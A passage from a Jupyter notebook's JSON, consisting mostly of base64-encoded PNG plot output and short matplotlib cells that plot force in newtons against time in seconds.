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\n",
"text/plain": [
"<matplotlib.figure.Figure at 0x7fc79c391be0>"
]
},
"metadata": {},
"output_type": "display_data"
}
],
"source": [
"fig, ax = plt.subplots(1, 1, figsize=(6,6), sharex=True)\n",
"\n",
"ax.plot(t,F,c='red')\n",
"plt.grid()\n",
"plt.xlabel('time (s)')\n",
"plt.ylabel('Force (N)')\n",
"\n",
"\n",
"ax.legend()"
]
},
{
"cell_type": "code",
"execution_count": 15,
"metadata": {
"scrolled": false
},
"outputs": [
{
"data": {
"text/plain": [
"<matplotlib.text.Text at 0x7fc79c1ef550>"
]
},
"execution_count": 15,
"metadata": {},
"output_type": "execute_result"
},
{
"data": {
"image/png": "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